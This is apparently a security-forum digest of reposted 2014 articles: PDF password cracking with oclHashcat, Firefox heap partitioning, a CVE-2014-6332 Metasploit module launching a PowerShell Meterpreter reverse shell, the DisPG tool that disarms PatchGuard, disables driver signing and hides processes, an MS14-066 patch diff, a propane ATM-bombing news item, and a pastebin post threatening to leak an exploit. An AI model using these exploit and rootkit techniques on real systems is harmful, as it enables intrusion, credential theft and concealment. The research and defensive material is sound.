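#include <sys/io.h>

int main(void)
{
    if (ioperm(0xB2, 1, 1) != 0) {   /* request access to I/O port 0xB2 */
        perror("ioperm");
        return 1;
    }
    outb(0x29, 0xB2);                /* SW SMI command byte 0x29 */
    puts("SW SMI 0x29 written to port 0xB2");
    return 0;
}

Slides: http://www.c7zero.info/stuff/BIOSandSecureBootAttacksUncovered_eko10.pdf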
  16. Cracking password protected PDF documents

We just started the work on oclHashcat to support cracking of password-protected PDFs. There are 5-6 different versions, but for PDF versions 1.1 - 1.3, which use RC4-40 (and we have a fast RC4 cracking kernel), we can already summarize:

Guaranteed to crack every password-protected PDF of format v1.1 - v1.3, regardless of the password used
All existing documents at once, as there's no salt involved after the key is computed
In less than 4 hours (single GPU)!! (the quick arithmetic below bears this out)

Here's what the output looks like:

root@et:~/oclHashcat-1.32# ./oclHashcat64.bin -w3 -m 10410 hash -a 3 ?b?b?b?b?b
oclHashcat v1.32 starting...

Device #1: Tahiti, 3022MB, 1000Mhz, 32MCU
Device #2: Tahiti, 3022MB, 1000Mhz, 32MCU
Device #3: Tahiti, 3022MB, 1000Mhz, 32MCU

Hashes: 1 hashes; 1 unique digests, 1 unique salts
Bitmaps: 8 bits, 256 entries, 0x000000ff mask, 1024 bytes
Applicable Optimizers:
* Zero-Byte
* Not-Iterated
* Single-Hash
* Single-Salt
* Brute-Force
Watchdog: Temperature abort trigger set to 90c
Watchdog: Temperature retain trigger set to 80c
Device #1: Kernel ./amd/m10410_a3.cl (21164 bytes)
Device #1: Kernel ./amd/markov_le_v1.cl (9208 bytes)
Device #1: Kernel ./amd/bzero.cl (887 bytes)
Device #2: Kernel ./amd/m10410_a3.cl (21164 bytes)
Device #2: Kernel ./amd/markov_le_v1.cl (9208 bytes)
Device #2: Kernel ./amd/bzero.cl (887 bytes)
Device #3: Kernel ./amd/m10410_a3.cl (21164 bytes)
Device #3: Kernel ./amd/markov_le_v1.cl (9208 bytes)
Device #3: Kernel ./amd/bzero.cl (887 bytes)

$pdf$1*2*40*-4*1*16*c015cff8dbf99345ac91c84a45667784*32*1f300cd939dd5cf0920c787f12d16be22205e?55a5bec5c9c6d563ab4fd0770d7*32*9a1156c38ab8177598d1608df7d7e340ae639679bd66bc4cd?a9bc9a4eedeb170:$HEX[db34433720]

Session.Name...: oclHashcat
Status.........: Cracked
Input.Mode.....: Mask (?b?b?b?b?b) [5]
Hash.Target....: $pdf$1*2*40*-4*1*16*c015cff8dbf99345ac91c84a45667784*32*1f300cd939dd5cf0920c787f12d16be22205e?55a5bec5c9c6d563ab4fd0770d7*32*9a1156c38ab8177598d1608df7d7e340ae639679bd66bc4cd?a9bc9a4eedeb170
Hash.Type......: PDF 1.3 (Acrobat 2, 3, 4) + collider-mode #1
Time.Started...: Fri Nov 7 16:05:44 2014 (19 mins, 42 secs)
Speed.GPU.#1...: 85019.7 kH/s
Speed.GPU.#2...: 85010.9 kH/s
Speed.GPU.#3...: 84962.4 kH/s
Speed.GPU.#*...: 255.0 MH/s
Recovered......: 1/1 (100.00%) Digests, 1/1 (100.00%) Salts
Progress.......: 301050363904/1099511627776 (27.38%)
Skipped........: 0/301050363904 (0.00%)
Rejected.......: 0/301050363904 (0.00%)
HWMon.GPU.#1...: 99% Util, 38c Temp, 25% Fan
HWMon.GPU.#2...: 99% Util, 39c Temp, 27% Fan
HWMon.GPU.#3...: 99% Util, 38c Temp, 27% Fan

Started: Fri Nov 7 16:05:44 2014
Stopped: Fri Nov 7 16:25:29 2014
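As a sanity check on those claims, a few lines of C (my arithmetic, using the per-GPU rate from the output above) show why exhausting the 40-bit RC4 keyspace fits in the stated time:

#include <stdio.h>

int main(void)
{
    const double keyspace   = 1099511627776.0;  /* 2^40 keys, matches Progress */
    const double single_gpu = 85.0e6;           /* ~85 MH/s per Tahiti GPU     */
    const double rig        = 255.0e6;          /* all three GPUs combined     */

    printf("single GPU, worst case: %.1f hours\n", keyspace / single_gpu / 3600.0);  /* ~3.6 */
    printf("3-GPU rig,  worst case: %.1f hours\n", keyspace / rig / 3600.0);         /* ~1.2 */
    return 0;
}

Sursa: https://hashcat.net/forum/thread-3818.html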
  17. Partitioned heap in Firefox, part 1

Published 15 Oct 2014

This post is meant to share some of the progress I've made in my current project at Mozilla, which I've been working on for about two months now. In short, the goal of this project is to use heap partitioning as a countermeasure for attacks based on use-after-free bugs, and in what follows, I'll (briefly) go over what we're trying to guard against, then proceed to explain what we're planning to do about it.

Use-after-free bugs and how they're exploited

Having very little security experience prior to taking this project, the first thing I did was spend a few days understanding how use-after-free bugs are exploited. As it turns out, they're often an essential part of attacks against browsers, given how malicious Javascript code can get the browser engine to perform arbitrary allocations while being executed. In particular, if any script gets a chance to run after an object is freed, but before it is (mistakenly) used again, then that script could attempt to allocate, say, an ArrayBuffer in that free'd memory region. In a simplistic scenario, if that allocation succeeds (and, with a deterministic memory allocator, chances are it will succeed), an attacker could overwrite the free'd object's vtable to control the execution flow of the browser when a method of the compromised object is next invoked.

While studying this, I found this description of a Firefox vulnerability found during Pwn2Own 2014 and this write-up on a WebKit exploit to be particularly useful. In the former, an ArrayBuffer is corrupted to leak some interesting memory addresses (thus bypassing Address Space Layout Randomization), which are then used to form a ROP payload that is entered after a jump is made to an address kept in memory that is used after being free'd. In the latter, a truly mindblowing sequence of steps is employed to overwrite the vtable of an object that is free'd and then used. The toy program below illustrates the allocator determinism all of this hinges on.
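A minimal illustration (my toy, not Firefox code, and deliberately relying on undefined behavior): with most allocators, a same-size allocation made right after a free reuses the freed chunk, so attacker-controlled bytes land exactly where a stale pointer still points:

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

struct victim {
    void (*handler)(void);   /* stand-in for a vtable slot */
};

static void legit(void) { puts("legit handler"); }

int main(void)
{
    struct victim *v = malloc(sizeof *v);
    v->handler = legit;

    free(v);                              /* bug: v is now dangling       */

    char *spray = malloc(sizeof *v);      /* "ArrayBuffer" of same size   */
    memset(spray, 0x41, sizeof *v);       /* attacker-controlled bytes    */

    /* With a deterministic allocator this usually prints "yes". */
    printf("freed chunk reused: %s\n", (void *)spray == (void *)v ? "yes" : "no");

    /* A real exploit would now call v->handler() and jump to 0x4141...;
     * here we only print the clobbered slot instead of calling it. */
    printf("stale handler slot: %p\n", (void *)v->handler);
    free(spray);
    return 0;
}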
Heap partitioning as a countermeasure

Attacks based on use-after-free bugs basically hinge on the predictability of the memory allocator: an attacker must be reasonably confident that triggering a memory allocation of the same size as a chunk of memory that was just free'd will cause the allocator to return that very same chunk. Thus, an effective way to counter these attacks is to partition the heap such that allocations that may be controlled by an attacker will never reuse memory that was previously allocated to internal browser objects. Specifically, Javascript objects that cause buffers to be allocated (and whose memory contents can be arbitrarily manipulated by an attacker), such as ArrayBuffers, should be allocated from an entirely separate memory pool from the rest of the browser engine. This approach has been implemented in other browsers to various extents, and Gecko already partitions a restricted set of objects, in addition to poisoning freed memory to help catch use-after-free bugs. However, despite being very effective, segregating entire classes of objects doesn't come at no cost: there's a very real risk of increasing memory fragmentation, and thus memory usage, which is something we've extensively tweaked in the past and care a lot about.

A word on memory allocators

After studying the available options, we came up with two alternatives for implementing heap partitioning: tweaking the existing allocator, or replacing it with Blink's PartitionAlloc. Firefox currently uses an allocator dubbed mozjemalloc, a modified version of the jemalloc allocator. It is not too difficult to understand its inner workings by reading the code and stepping through some allocations with a debugger, but I also found a Phrack article about jemalloc to be a valuable resource. As a bonus, the article is written from an attacker's perspective, which is good for "know-your-enemy" purposes. While it is not too hard to tweak mozjemalloc so it uses different partitions, we're currently in the process of updating our allocator back to unmodified jemalloc (aka jemalloc3), so it's more sensible to implement partitioning on top of jemalloc3 instead of mozjemalloc. Plus, jemalloc3 provides handy API calls that can be used for partitioning, which is less intrusive than what we'd need to do with mozjemalloc (a sketch of that arena-based approach follows below).
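To make that concrete, here is a rough sketch of arena-based partitioning (my example, not Gecko code), assuming an unprefixed jemalloc 3.4+ build with its non-standard mallocx/dallocx API and the "arenas.extend" mallctl (renamed "arenas.create" in jemalloc 4); build with -ljemalloc:

#include <jemalloc/jemalloc.h>
#include <stdio.h>
#include <stdlib.h>

static int partition_flags;   /* MALLOCX_ARENA(...) for the partition */

static void partition_init(void)
{
    unsigned arena;
    size_t len = sizeof(arena);
    /* Create a dedicated arena for attacker-reachable buffers. */
    if (mallctl("arenas.extend", &arena, &len, NULL, 0) != 0) {
        fprintf(stderr, "mallctl failed\n");
        exit(1);
    }
    partition_flags = MALLOCX_ARENA(arena);
}

/* Script-reachable buffers come from the partition, so they can never
 * reuse chunks freed by engine-internal allocations, and vice versa. */
static void *buffer_alloc(size_t n) { return mallocx(n, partition_flags); }
static void buffer_free(void *p)    { dallocx(p, partition_flags); }

int main(void)
{
    partition_init();
    void *internal = malloc(64);      /* engine-internal object       */
    void *buf = buffer_alloc(64);     /* "ArrayBuffer" contents       */
    printf("internal %p vs partitioned %p\n", internal, buf);
    buffer_free(buf);
    free(internal);
    return 0;
}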
PartitionAlloc (PA for short), on the other hand, is built from the ground up with partitioning in mind, and while it will certainly cause a lot more integration woes than jemalloc3, it's definitely worth experimenting with. Given that it's an off-the-shelf solution for partitioning, I haven't bothered too much with understanding how it works yet, nor have I found any references about it aside from the code itself.

Building up to the experiments

After taking in all that new information, it became apparent that there was a lot of work to be done on both fronts, jemalloc3 and PA, up until the milestone where we'd get some data to compare them and pick the winner. The JS engine folks advised me that the simplest way to get some experimental data for memory usage would be not to try to allocate specific objects in a separate partition, but rather to separate all engine allocations from the rest of the browser. Given that the buffers we're interested in isolating account for most of the memory used by SpiderMonkey, this would give us a good approximation of the final results without having to worry too much about their hierarchy of memory functions. Thus, I spent the following weeks attempting to create two builds: one in which SpiderMonkey allocates from a separate jemalloc3 partition from the rest of Gecko, and another in which it allocates from PA, with jemalloc3 being used for the rest of Gecko. The latter may sound odd (that's because it is), but it proved to be a lot easier than replacing the allocator for all of Gecko with PA, and I believe it is enough for comparison purposes. Additionally, I began working on the jemalloc3 transition by helping upstream some changes that had been made on mozjemalloc (bug 801536). As an interesting aside, the PA builds unveiled several violations of the JS engine API in which the memory allocators used by Gecko and SpiderMonkey were mixed (for instance, attempting to free from one of them memory that was allocated from the other), all over the code. I fixed all that I could find.

Experiments

We have a great tool for measuring Firefox's memory footprint under realistic loads called Are We Slim Yet?, which I'll refer to as AWSY for brevity. Once the necessary builds were ready, the next step was to run them through AWSY and see how they performed.

[Figure] Columns, left to right: jemalloc3 with partition, mozjemalloc, jemalloc3 without partition, PartitionAlloc + jemalloc3 Frankenbuild

The graph above shows RSS, the main metric we're interested in (the amount of physical memory used by Firefox), in four different builds. From left to right: jemalloc3 with a separate partition for SpiderMonkey, an unmodified build using mozjemalloc, jemalloc3 without a separate partition, and jemalloc3 with PartitionAlloc for SpiderMonkey. The complete AWSY run has all the results, but it also shows pretty obviously that the in-browser memory accounting is broken with PartitionAlloc, so it's best to constrain our analysis to RSS.

Conclusions and next steps

Despite the iffiness of the jemalloc3 + PartitionAlloc Frankenbuild, the experimental evidence shows that:
1. There's no reason to expect PartitionAlloc's memory footprint to be much better than jemalloc3's
2. Partitioning jemalloc3 should introduce little additional memory overhead
3. jemalloc3 regresses significantly when compared with mozjemalloc

Given the difficulty in integrating PartitionAlloc and conclusion 1 above, the takeaway is that the best way forward is to give up on PartitionAlloc for now and invest in jemalloc3, which we're more than halfway through transitioning to anyway. Of course, should our jemalloc3 solution prove insufficient for any reason, we now also have evidence that PartitionAlloc is a worthy contender for the future. Conclusion 2 gives us some confidence that going with jemalloc3 will not cause Firefox's memory usage to skyrocket, but point 3, for which there is a known bug, is a bit more worrying, so I'll investigate that next.

Acknowledgements

Special thanks to Daniel Veditz, Mike Hommey, Nicholas Nethercote, Terrence Cole, Steven Fink and John Schoenick for contributing to and guiding me through the various parts of these experiments.

Sursa: might as well hack it | Partitioned heap in Firefox, part 1
  18. CVE-2014-6332: it's raining shells

This is a shared post by me (@wez3forsec) and Rik van Duijn (@rikvduijn)

Today @yuange tweeted a proof of concept for CVE-2014-6332, a critical Internet Explorer vulnerability that was patched with MS14-064. The PoC was able to execute the application notepad.exe. We wanted to pop some actual shells with this, so the race began to find a way of executing more than just notepad or calc. The "great" thing is that this vulnerability affects everything from Windows 95 + IE 3.0 through Windows 10 + IE 11: from a pentester's perspective this is awesome; from a blue team perspective this will make you cry.

CVE-2014-6332 alliedve.htm 404???? allie(win95+ie3-win10+ie11) dve copy by yuange in 2009. — yuange (@yuange75) 12 november 2014

We wanted to pop shells, so we created a Metasploit module. This allows us to adapt our exploit when needed, gives us the usability of the Metasploit framework, and gives us the ability to launch lots of different payloads supported by the framework. To start the payloads, we decided to use Powershell. This has some advantages: Powershell is, for example, useful for bypassing anti-virus software, because it is able to inject payloads directly into memory. Moreover, on newer versions of Windows we were unable to run even cmd.exe or other commands like ipconfig. Fun fact: application whitelisting usually whitelists Powershell, so use more Powershell!

The original exploit runs notepad.exe in order to prove it was able to execute code. We modified it to execute powershell.exe and inject a Meterpreter into memory. First we modified the HTML page so it's easy to handle within Ruby; then we added powershell.exe in order to see if it would actually execute.

def on_request_uri(cli, request)
    payl = cmd_psh_payload(payload.encoded,"x86",{ :remove_comspec => true })
    payl.slice! "powershell.exe "

The above code generates a complete Powershell one-liner for a payload; we are using a reverse_tcp Meterpreter shell, but it could use something else.

function runmumaa()
    On Error Resume Next
    set shell=createobject("Shell.Application")
    shell.ShellExecute "powershell.exe", "#{payl}", "", "open", 1
end function

The magic runmumaa() function: after safe mode is disabled this function is called, and the actual shell is executed using the Powershell payload generated earlier. In the short time available to us we were unable to figure out how the exploit actually works; the function setnotsafemode() seems to do the heavy lifting.

Let's see if we are able to pop a shell, shall we? First we set up our exploit: we added our module to the /usr/share/metasploit-framework/modules/exploits/windows/browser/ folder using the name ms14_064_ie_olerce.rb. The module has various options which need to be configured; as stated earlier, we used a reverse_tcp Meterpreter payload. Next we started our handler and, using Internet Explorer, navigated to the URL; we see a quick popup from Powershell, but it disappears quickly. Checking netstat, we see a connection to port 80 from the process "system" to our Kali VM. Checking Metasploit, we see we have gained a shell and are now able to execute system commands; maybe try out that fancy new privilege escalation exploit (exploit/windows/local/ms14_058_track_popup_menu) and use Mimikatz to read passwords in plaintext. Remember, this is a quick and dirty PoC; Metasploit devs are probably yelling at their screens telling us how this is not how to build a proper module. They are right!
But it works, and with some more work this could be a full-fledged Metasploit module. The Metasploit module can be found here: ms14_064_ie_olerce.rb. Please note: make sure you have the latest Metasploit installed. For more details about the vulnerability, see: IBM X-Force Researcher Finds Significant Vulnerability in Microsoft Windows

Sursa: https://forsec.nl/2014/11/cve-2014-6332-internet-explorer-msf-module/
  19. DisPG

This is proof-of-concept code to encourage security researchers to examine PatchGuard more by showing actual code that disables PatchGuard at runtime. It does the following things:

- disarms PatchGuard on certain patch versions of XP SP2, Vista SP2, 7 SP1 and 8.1 at run-time.
- disables Driver Signing Enforcement and allows you to install an arbitrary unsigned driver, so that you can examine the x64 kernel using kernel patch techniques if you need to.
- hides processes whose names start with 'rk' to demonstrate that PatchGuard is being disarmed.

See NOTE.md for implementation details.

Demo
This is how it is supposed to work.

Installation

Configuring x64 Win8.1
1. Install x64 Win8.1 (editions should not matter). Using a virtual machine is strongly recommended.
2. Apply all Windows Updates.
3. Enable test signing: launch a command prompt with Administrator privilege and execute the following commands.
   > bcdedit /copy {current} /d "Test Signing Mode"
   The entry was successfully copied to {xxxx}.
   > bcdedit /set {xxxx} TESTSIGNING ON
4. Copy the \x64\Release folder to the test box (the location should not matter).
5. Shut down Windows.
6. (Optional) Take a snapshot if you are using a VM.

Getting Ready for Execution
1. Boot Windows in "Test Signing Mode".
2. Execute Dbgview with Administrator privilege and enable Capture Kernel.

Executing and Monitoring
1. Run DisPGLoader.exe with Administrator privilege and an internet connection so that it can download debug symbols. You should see the following messages:

   FFFFF8030A2F8D10 : ntoskrnl!ExAcquireResourceSharedLite
   ...
   Loading the driver succeeded.
   Press any key to continue . . .

   And you should also see the following messages in DebugView:

   [ 4: 58] Initialize : Starting DisPG.
   [ 4: 58] Initialize : PatchGuard has been disarmed.
   [ 4: 58] Initialize : Hiding processes has been enabled.
   [ 4: 58] Initialize : Driver Signing Enforcement has been disabled.
   [ 4: 58] Initialize : Enjoy freedom
   [ 4: 10c] PatchGuard xxxxxxxxxxxxxxxx : blahblahblah.
   [ 4: 10c] PatchGuard yyyyyyyyyyyyyyyy : blahblahblah.

   Each output with 'PatchGuard' shows execution of validation by PatchGuard, yet none of them should cause a BSOD because it has been disarmed. xxxxxxxxxxxxxxxx and yyyyyyyyyyyyyyyy are addresses of PatchGuard contexts. They may or may not change each time, but after rebooting Windows, you will see different patterns, as most random factors are decided at boot time. Note that you will see different output when you run the code on Windows 7, Vista and XP because the implementation of the disarming code for them is completely different.
2. (Optional) Start any process whose name starts with 'rk' and confirm that it is not listed in Task Manager or similar tools.
3. (Optional) Keep Windows running at least 30 minutes to confirm PatchGuard was really disabled. When you reboot Windows, DisPG will not be reloaded automatically.

Uninstallation
It cannot be stopped and removed at runtime as it is just concept code. In order to uninstall DisPG, reboot Windows and simply delete all the files you copied.

Tested Platforms
Windows 8.1 x64 (ntoskrnl.exe versions: 17085, 17041, 16452)
Windows 7 SP1 x64 (ntoskrnl.exe versions: 18409, 18247)
Windows Vista SP2 x64 (ntoskrnl.exe versions: 18881)
Windows XP SP2 x64 (ntoskrnl.exe versions: 5138)

License
This software is released under the MIT License; see LICENSE.

Sursa: https://github.com/tandasat/PgResarch/tree/master/DisPG
  20. Windows Phone security sandbox survives Pwn2Own unscathed

Microsoft phone coughs up cookies, but full compromise fails.

by Dan Goodin - Nov 13 2014, 5:20pm

Microsoft's Windows Phone emerged only partially scathed from this year's Mobile Pwn2Own hacking competition after a contestant failed to fully pierce its defenses. A blog post from Hewlett-Packard, whose Zero Day Initiative organizes the contest, provided only sparse details. Nonetheless, the account appeared to show Windows Phone largely surviving. An HP official wrote:

First, Nico Joly—who refined his competition entry on the very laptop he won at this spring's Pwn2Own in Vancouver as part of the VUPEN team—was the sole competitor to take on Windows Phone (the Lumia 1520) this year, entering with an exploit aimed at the browser. He was successfully able to exfiltrate the cookie database; however, the sandbox held and he was unable to gain full control of the system.

No further details were immediately available. HP promised to provide more color about hacks throughout the two-day contest in the coming weeks, presumably after companies have released patches. The Windows Phone attack came during day two of the mobile hacking contest. During day one, an iPhone 5S, Samsung Galaxy S5, LG Nexus 5, and Amazon Fire Phone were all fully hijacked. More details are here.

Sursa: Windows Phone security sandbox survives Pwn2Own unscathed | Ars Technica
  21. This Is How ATMs Get Hacked in Russia: Using Explosives

Jamie Condliffe | Filed to: security

Forget super-skinny card skimmers and clever malware attacks. In Russia, many of the attempts to illegally obtain cash from ATMs are rather more crude, because they involve explosives.

English Russia points out that more than 20 Russian ATMs have been blown up recently in attempts to steal money. The site reports that criminals pump the cash dispensers with propane, which they then ignite, tearing the machines apart with brute force in the process. The explosions can send debris up to 50 meters from the ATM. It clearly works: the perpetrators typically make off with 2,500,000 rubles, or around $50,000, at a time. [English Russia]

Sursa: This Is How ATMs Get Hacked in Russia: Using Explosives
  22. MS14-066 schannel.dll diff (Windows 2003 SP2) @@ -29399,13 +29399,13 @@ int __stdcall SPVerifySignature(HCRYPTPROV hProv, int a2, ALG_ID Algid, BYTE *pbData, DWORD dwDataLen, BYTE *pbEncoded, DWORD cbEncoded, int a8) { signed int v8; // esi@4 - BOOL v9; // eax@8 + BOOL v9; // eax@9 DWORD v10; // eax@14 - DWORD pcbStructInfo; // [sp+Ch] [bp-3Ch]@11 + DWORD pcbStructInfo; // [sp+Ch] [bp-3Ch]@13 HCRYPTKEY phKey; // [sp+10h] [bp-38h]@1 HCRYPTHASH phHash; // [sp+14h] [bp-34h]@1 BYTE *pbSignature; // [sp+18h] [bp-30h]@1 - char pvStructInfo; // [sp+1Ch] [bp-2Ch]@11 + char pvStructInfo; // [sp+1Ch] [bp-2Ch]@13 phKey = 0; phHash = 0; @@ -29416,39 +29416,40 @@ if ( !pbSignature ) { v8 = -2146893056; - goto LABEL_18; + goto LABEL_20; } - if ( !CryptImportKey(hProv, *(const BYTE **)a2, *(_DWORD *)(a2 + 4), 0, 0, &phKey) - || !CryptCreateHash(hProv, Algid, 0, 0, &phHash) ) - goto LABEL_12; - v9 = a8 ? CryptHashData(phHash, pbData, dwDataLen, 0) : CryptSetHashParam(phHash, 2u, pbData, 0); - if ( !v9 ) - goto LABEL_12; - if ( *(_DWORD *)(*(_DWORD *)a2 + 4) == 8704 ) + if ( CryptImportKey(hProv, *(const BYTE **)a2, *(_DWORD *)(a2 + 4), 0, 0, &phKey) + && CryptCreateHash(hProv, Algid, 0, 0, &phHash) ) { - pcbStructInfo = 40; - if ( !CryptDecodeObject(1u, (LPCSTR)0x28, pbEncoded, cbEncoded, 0, &pvStructInfo, &pcbStructInfo) ) + v9 = a8 ? CryptHashData(phHash, pbData, dwDataLen, 0) : CryptSetHashParam(phHash, 2u, pbData, 0); + if ( v9 ) { -LABEL_12: - GetLastError(); - v8 = 3; - goto LABEL_18; + if ( *(_DWORD *)(*(_DWORD *)a2 + 4) != 8704 ) + { + ReverseMemCopy((unsigned int)pbSignature, (int)pbEncoded, cbEncoded); +LABEL_18: + v8 = CryptVerifySignatureA(phHash, pbSignature, cbEncoded, phKey, 0, 0) != 0 ? 0 : -2147483391; + goto LABEL_20; + } + pcbStructInfo = 40; + if ( CryptDecodeObject(1u, (LPCSTR)0x28, pbEncoded, cbEncoded, 0, &pvStructInfo, &pcbStructInfo) ) + { + v10 = pcbStructInfo; + if ( pcbStructInfo > cbEncoded ) + goto LABEL_15; + qmemcpy(pbSignature, &pvStructInfo, pcbStructInfo); + cbEncoded = v10; + goto LABEL_18; + } } - v10 = pcbStructInfo; - qmemcpy(pbSignature, &pvStructInfo, pcbStructInfo); - cbEncoded = v10; } - else - { - ReverseMemCopy((unsigned int)pbSignature, (int)pbEncoded, cbEncoded); - } - v8 = CryptVerifySignatureA(phHash, pbSignature, cbEncoded, phKey, 0, 0) != 0 ? 0 : -2147483391; - } - else - { - v8 = -1; + GetLastError(); +LABEL_15: + v8 = 3; + goto LABEL_20; } -LABEL_18: + v8 = -1; +LABEL_20: if ( phKey ) CryptDestroyKey(phKey); if ( phHash ) @@ -29458,7 +29459,7 @@ return v8; } Sursa: https://gist.github.com/hmoore-r7/01a2940edba33f19dec3
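The heart of the patch above is the new "pcbStructInfo > cbEncoded" comparison: before MS14-066, the decoded signature was copied into the pbSignature buffer (sized from cbEncoded) without any length check. A distilled C sketch of the pattern (my paraphrase of the decompiled logic, not Microsoft's source):

#include <string.h>

/* Sketch of SPVerifySignature's signature-copy step: pbSignature holds
 * cbEncoded bytes, and "decoded" is CryptDecodeObject()'s output of
 * pcbStructInfo bytes. */
int copy_decoded_signature(unsigned char *pbSignature, size_t cbEncoded,
                           const unsigned char *decoded, size_t pcbStructInfo)
{
    /* Pre-patch: the copy ran unconditionally, so a decode result larger
     * than the buffer overran pbSignature. Post-patch: */
    if (pcbStructInfo > cbEncoded)   /* the check MS14-066 adds */
        return -1;                   /* reject, like the new LABEL_15 path */
    memcpy(pbSignature, decoded, pcbStructInfo);
    return 0;
}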
  23. # I need a good doxbin onion back! Software SUCKS!

Calling out "SChannel Shenanigans"

Part one of the in depth story of MS14-666 / CVE-2014-6321

So, about those "SChannel Shenanigans"... Sit down and let me set the record straight! This is the story of the most under-played Patch Tuesday update ever delivered. The "SChannel Shenanigans" bug is a once in a lifetime type of vulnerability, and Microsoft is mis-representing the scope and severity of this defect. This is also the story of an opportunity lost by indecision; Learn from my fail! And while software sucks, you can mitigate harsh reality with defense in depth and consistent care. Yes, this vulnerability must be called "SChannel Shenanigans" or the wrath of "The Exploit" be upon you and your house!

Some background to understand this discussion:

def Lsa...() {
}

^- This is easy code like for a "Function or Method Definition", or said another way, 'the instructions the computer carries out'. From here simply called "Methods".

Attack surface and call graph describe how complicated, and how frequently, a particular function may be called. The more complicated or prominently used the code, the larger the attack surface is. The more frequently a function is called, the larger the risk it carries if compromised. From here simply called "Surface".

Privileges and capabilities are the "keys" the vulnerable process carries, which in turn can be stolen and used for more attacks if that process is compromised. These privileges, as held by Operating System and Platform Services processes and methods, are what give you access to everything: data stored, transmitted, remote services or networks, everything. From here simply referred to as "Privs" for short.

What makes "SChannel Shenanigans" so dangerous?

A number of things, combined, make this defect exceptionally dangerous to everyone running Windows 2000 and newer. As hinted at with the first vulnerable version, the code affected is very old and very complicated. Old code with very large Surface explains the first aspect of risk. Next is the remote exposure of the huge Surface to attackers who may remain anonymous. This impact at a distance, before verifying credentials or permitting access, is the second aspect of risk. Finally, the frequent and pervasive use of the vulnerable Lsa Methods in all versions of affected Windows means there are many avenues to 100% success of SYSTEM Privs. Sometimes called "God Mode" exploits when utilized to take over systems.

It is as if our story code had been written like:

< inside vulnerable SYSTEM Services >

def SYSTEM/AdministratorMainLoop() {
    while always {
        runService();
        handleEvents();
    }
}

def runService() {
    while always {
        contactRemoteServiceMaybe();       // calls vulnerable Lsa Method
        handleLocalRequestMaybe();         // calls vulnerable Lsa Method
    }
}

def handleEvents() {
    while always {
        acceptShadyInputsFromStrangers();  // calls vulnerable Lsa Method
        passThroughShadyToOthers();        // calls vulnerable Lsa Method
    }
}

< inside vulnerable applications >

def insideEveryApplicationOnWindows() {
    doAnyCryptoStuff();                    // calls vulnerable Lsa Method
                                           // may be sandbox/restricted - doChain();
}

Exploits through remote services like RDP, IIS, ActiveDirectory(LDAP), MSSQL, are pivots to the rest of your critical infrastructure. Exploits through event handling yield Privs. Exploits through least privileged sand boxed processes can in turn incur Lsa Method calls in processes with Privs, including guest virtual machines on Windows hosts running VMware or VirtualBox.
In every way, this was one of those rare vulnerabilities in just the right place, giving a "God Mode" so effective you begin to question your own sanity. Thus when tracing through a confirmed exploitable call to the vulnerable Lsa Method, and another, and another, it begins to dawn on me just how dangerous this exploit is. It cannot be sold, without falling into wrong hands. It cannot be Full Disclosure'd, without creating pandemonium. It cannot be used without the utmost caution, lest it be stolen by an observer. In fact, talking about it makes me nervous, so let's just call it "The Exploit" and you are sworn to secrecy until we... Well, what the hell do we do with it? Sadly, this is as far as we'll get in the background portion of the first part of our tale. To sum up each amplifying risk factor for "SChannel Shenanigans": a.) Before authentication. Methods called early on in many, many applications and libraries and services. Surface exposed to any attackers, and early. b.) Always results in SYSTEM Privs, local or remote. A "God Mode" exploit with 100% success. c.) Multiplicity of use and high exposure of flawed code. Huge Surface; everything including Windows 2000 onward is vulnerable. d.) Legacy code carried onward, forever. This means modern protections that make exploiting Methods more difficult are not applied here. No EMET for you here, foolish Earth Human! And finally, an ultimatum or two. I did not know what to do with this before, but I do know what to do now given Microsoft's response to these defects. Microsoft has until the end of day Friday the 14th to change MS14-066 Exploit-ability Assessment to "0- Exploitation Detected". If they do not, I will anonymously distribute "The Exploit". Microsoft has until this time next month December 16th to release a patch for legacy XP customers also affected by this vulnerability. Additional time is granted given the overhead of build and test for a new platform on short notice. TL;DR: - Pre-auth remote exec and local Priv escalate in SChannel by 1 or more from year 2011 onward. - Every organization should run a Secure Drop for hot defect reports. - Microsoft owes their customers full disclosure and accurate risk guidance for MS14-066. - Microsoft owes XP legacy users a proper fix, too. With same four new cipher suites. - Assume all software is vulnerable, defend with depth and know how to recover. Langsec Coreboot Qubes FTW! P.S. Some of you may be skeptical; that's fine. I know all about you, my dear #infosec. 
The following code-cleaned versions of the Win2K sources listed are sha256sum hashed as follows:

private/security/schannel/lsa/bullet.c
private/security/schannel/lsa/callback.c
private/security/schannel/lsa/credapi.c
private/security/schannel/lsa/ctxtapi.c
private/security/schannel/lsa/ctxtattr.c
private/security/schannel/lsa/debug.c
private/security/schannel/lsa/events.c
private/security/schannel/lsa/init.c
private/security/schannel/lsa/libmain.c
private/security/schannel/lsa/mapper.c
private/security/schannel/lsa/package.c
private/security/schannel/lsa/spreg.c
private/security/schannel/lsa/stubs.c
private/security/schannel/lsa/userctxt.c
private/security/schannel/lsa/usermode.c
private/security/schannel/spbase/asn1enc.c
private/security/schannel/spbase/cache.c
private/security/schannel/spbase/capi.c
private/security/schannel/spbase/cert.c
private/security/schannel/spbase/certmap.c
private/security/schannel/spbase/ciphfort.c
private/security/schannel/spbase/cliprot.c
private/security/schannel/spbase/context.c
private/security/schannel/spbase/cred.c
private/security/schannel/spbase/debug.c
private/security/schannel/spbase/defcreds.c
private/security/schannel/spbase/keyxfort.c
private/security/schannel/spbase/keyxmsdh.c
private/security/schannel/spbase/keyxmspk.c
private/security/schannel/spbase/oidenc.c
private/security/schannel/spbase/pct1cli.c
private/security/schannel/spbase/pct1msg.c
private/security/schannel/spbase/pct1pckl.c
private/security/schannel/spbase/pct1srv.c
private/security/schannel/spbase/protutil.c
private/security/schannel/spbase/rng.c
private/security/schannel/spbase/sigfort.c
private/security/schannel/spbase/sigsys.c
private/security/schannel/spbase/specmap.c
private/security/schannel/spbase/srvprot.c
private/security/schannel/spbase/ssl2cli.c
private/security/schannel/spbase/ssl2msg.c
private/security/schannel/spbase/ssl2pkl.c
private/security/schannel/spbase/ssl2srv.c
private/security/schannel/spbase/ssl3.c
private/security/schannel/spbase/ssl3key.c
private/security/schannel/spbase/ssl3msg.c
private/security/schannel/spbase/tls1key.c
private/security/schannel/utillib/enc.c
private/security/schannel/utillib/keys.c
private/security/schannel/utillib/test.c
private/security/schannel/pkiutil/pkialloc.cpp
private/security/schannel/pkiutil/pkiasn1.cpp

Please, for your own sake, don't call my bluff Microsoft!

Sursa: SChannelShenanigans - Pastebin.com
  24. Android-SSL-TrustKiller

Blackbox tool to bypass SSL certificate pinning for most applications running on a device.

Description
This tool leverages Cydia Substrate to hook various methods in order to bypass certificate pinning by accepting any SSL certificate.

Usage
